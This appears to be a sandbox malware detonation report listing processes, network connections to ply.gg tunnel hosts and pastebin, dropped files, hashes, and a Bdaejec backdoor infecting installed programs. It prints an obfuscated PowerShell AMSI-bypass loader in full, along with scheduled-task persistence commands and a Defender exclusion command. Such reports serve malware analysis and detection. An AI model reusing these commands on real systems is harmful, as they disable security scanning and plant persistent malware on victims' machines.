$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+[Char](97)+'t'+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$zUmNWvNEfvGxgY=$mSwoYymFuWlVE.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+'rocA'+[Char](100)+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lEztCYVLuVtJPkcYJYi=MlddtWyOVLTW @([String])([IntPtr]);$jICCRMIPPqRnYXtvJdldLM=MlddtWyOVLTW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KIwfODEbxgj=$mSwoYymFuWlVE.GetMethod('Ge'+'t'+''+'M'+'o'+'d'+''+'u'+'le'+'H'+''+[Char](97)+''+'n'+''+'d'+'le').Invoke($Null,@([Object]('ke'+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$OeAuXBiyErhtak=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$KIwfODEbxgj,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$BOchzXxqRvbXTKEFb=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$KIwfODEbxgj,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'al'+[Char](80)+'ro'+'t'+''+[Char](101)+''+[Char](99)+'t')));$CXOJPir=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OeAuXBiyErhtak,$lEztCYVLuVtJPkcYJYi).Invoke('a'+'m'+''+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jIaFoqTzGsQyvAiqw=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$CXOJPir,[Object](''+'A'+''+'m'+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$NqCesFVuxP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BOchzXxqRvbXTKEFb,$jICCRMIPPqRnYXtvJdldLM).Invoke($jIaFoqTzGsQyvAiqw,[uint32]8,4,[ref]$NqCesFVuxP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jIaFoqTzGsQyvAiqw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BOchzXxqRvbXTKEFb,$jICCRMIPPqRnYXtvJdldLM).Invoke($jIaFoqTzGsQyvAiqw,[uint32]8,0x20,[ref]$NqCesFVuxP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+'A'+'RE').GetValue(''+[Char](36)+''+[Char](78)+''+'o'+''+[Char](100)+''+'e'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST

C:\Windows\System32\$Node2Json.exe

"C:\Windows\System32\$Node2Json.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST

C:\Windows\System32\$Node3Json.exe

"C:\Windows\System32\$Node3Json.exe"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d71cd49a-0d08-422d-a6a6-1cd83e29f9ab}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 every-bend.gl.at.ply.gg udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 8.8.8.8:53 visit-kill.gl.at.ply.gg udp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp

Files

memory/3816-0-0x00007FFC6F2B3000-0x00007FFC6F2B5000-memory.dmp

memory/3816-1-0x0000000000EB0000-0x0000000000F12000-memory.dmp

memory/2344-2-0x000001EBB1E30000-0x000001EBB1E52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1mucxyq.10e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2344-12-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

memory/2344-13-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

memory/2344-14-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

memory/2344-15-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

memory/2344-16-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

memory/2344-19-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

memory/3816-22-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

C:\Windows\System32\$Node32.exe

MD5 b850f016450d68da0ae4bb945355f70c
SHA1 521726c38af715e6ee1c76315151f0ed9518c6f4
SHA256 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24
SHA512 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3eb3833f769dd890afc295b977eab4b4
SHA1 e857649b037939602c72ad003e5d3698695f436f
SHA256 c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512 c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 af1cc13f412ef37a00e668df293b1584
SHA1 8973b3e622f187fcf484a0eb9fa692bf3e2103cb
SHA256 449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037
SHA512 75d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3

C:\Windows\System32\$Node2Json.exe

MD5 41814c2aa6f0aaffaaaa26ffd07b3550
SHA1 ea9731c42a382ed003b5b4bfd28c3ba437c8d14a
SHA256 da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e
SHA512 f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

memory/3552-61-0x0000000000AA0000-0x0000000000AC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70e829e200994d93172199e56c369439
SHA1 051915bb2944acc4de6b948913c7cfddaebd3aa2
SHA256 5c09ae4bd7edd4d26fc157b2eeaf2c1dfe81dc9ff551c5f359773443de7b0d1f
SHA512 b722a32b6b13a8f536743699ec13b6e2c6c8532cb2b2652d6c3b561b970e2a542f8e88b1644d91b8ace8d7ea6313ad667d0e8d3b4c6f5a51f560ded716c407fe

C:\Windows\System32\$Node3Json.exe

MD5 391d4f99d0076ce566b370f1572ef670
SHA1 0bf04beb77440315098bacf30563a6542e254a45
SHA256 b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605
SHA512 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

memory/3816-100-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp

memory/1052-101-0x00000000002A0000-0x00000000002C2000-memory.dmp

memory/1704-102-0x000001FB289B0000-0x000001FB289DA000-memory.dmp

memory/1704-104-0x00007FFC8CDB0000-0x00007FFC8CE6D000-memory.dmp

memory/1704-103-0x00007FFC8D610000-0x00007FFC8D808000-memory.dmp

memory/1692-108-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1692-107-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1692-106-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1692-105-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1692-112-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1692-114-0x00007FFC8CDB0000-0x00007FFC8CE6D000-memory.dmp

memory/1692-115-0x0000000140000000-0x0000000140008000-memory.dmp

memory/684-136-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp

memory/684-135-0x000002ECB6EB0000-0x000002ECB6EDA000-memory.dmp

memory/480-156-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp

memory/480-155-0x000001FC93D60000-0x000001FC93D8A000-memory.dmp

memory/480-150-0x000001FC93D60000-0x000001FC93D8A000-memory.dmp

memory/424-166-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp

memory/424-165-0x000002A41A960000-0x000002A41A98A000-memory.dmp

memory/424-160-0x000002A41A960000-0x000002A41A98A000-memory.dmp

memory/964-146-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp

memory/964-145-0x0000025886BA0000-0x0000025886BCA000-memory.dmp

memory/964-140-0x0000025886BA0000-0x0000025886BCA000-memory.dmp

memory/684-131-0x000002ECB6EB0000-0x000002ECB6EDA000-memory.dmp

memory/632-126-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp

memory/632-125-0x000002807B060000-0x000002807B08A000-memory.dmp

memory/632-120-0x000002807B060000-0x000002807B08A000-memory.dmp

memory/632-119-0x000002807B060000-0x000002807B08A000-memory.dmp

memory/632-118-0x000002807B030000-0x000002807B055000-memory.dmp

memory/1692-113-0x00007FFC8D610000-0x00007FFC8D808000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 4ac1741ceb19f5a983079b2c5f344f5d
SHA1 f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA256 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 a9124c4c97cba8a07a8204fac1696c8e
SHA1 1f27d80280e03762c7b16781608786f5a98ff434
SHA256 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

97s

Max time network

159s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3364 wrote to memory of 4632 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3364 wrote to memory of 4632 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3364 wrote to memory of 4632 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe"

Signatures

Bdaejec

backdoor bdaejec

Bdaejec family

bdaejec

Detects Bdaejec Backdoor.

Description Indicator Process Target
N/A N/A N/A N/A

Stops running service(s)

evasion execution

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\IEContentService.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Windows Defender\NisSrv.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVLP.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Windows Defender\MsMpEng.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseIdentity.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\Integrator.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\servertool.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File created C:\Program Files (x86)\MTA San Andreas 1.6\server\mods\deathmatch\deathmatch.dll C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseAP.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\orbd.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jar.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoia.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseImdsCollector.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseAPToast.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateComRegisterShell64.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jmap.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
